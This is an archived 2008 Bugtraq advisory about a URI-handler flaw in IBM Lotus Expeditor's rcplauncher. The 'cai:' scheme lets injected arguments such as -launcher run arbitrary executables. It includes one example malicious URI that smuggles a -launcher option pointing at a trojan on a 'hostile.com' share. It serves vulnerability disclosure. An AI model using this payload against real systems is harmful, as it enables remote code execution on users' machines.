[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Lotus expeditor rcplauncher uri handler vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Lotus expeditor rcplauncher uri handler vulnerability
From: "Thomas Pollet" <thomas.pollet@xxxxxxxxx>
Date: Fri, 25 Apr 2008 17:04:02 +0200

Hello

Lotus expeditor rcplauncher registers a cai: uri handler.
 This handler executes
"D:\Program Files\IBM\Lotus\Symphony\framework\rcp\rcplauncher.exe"
-config notes -com.ibm.rcp.portal.app.ui#openCA "%1"
the rcplauncher process accepts various arguments which can be abused
to execute arbitrary code.
 The argument to the -launcher option for example is an executable
that will be executed.

malicious uri example:
cai:"%20-launcher%20\\hostile.com\d$\trojan

original advisory :
http://thomas.pollet.googlepages.com/lotusexpeditorurihandlervulnerability

Regards,
Thomas Pollet

Prev by Date: [ MDVSA-2008:091 ] - Updated wireshark packages fix denial of service vulnerabilities
Next by Date: R.I.P. rgod
Previous by thread: [ MDVSA-2008:091 ] - Updated wireshark packages fix denial of service vulnerabilities
Next by thread: R.I.P. rgod
Index(es):
- Date
- Thread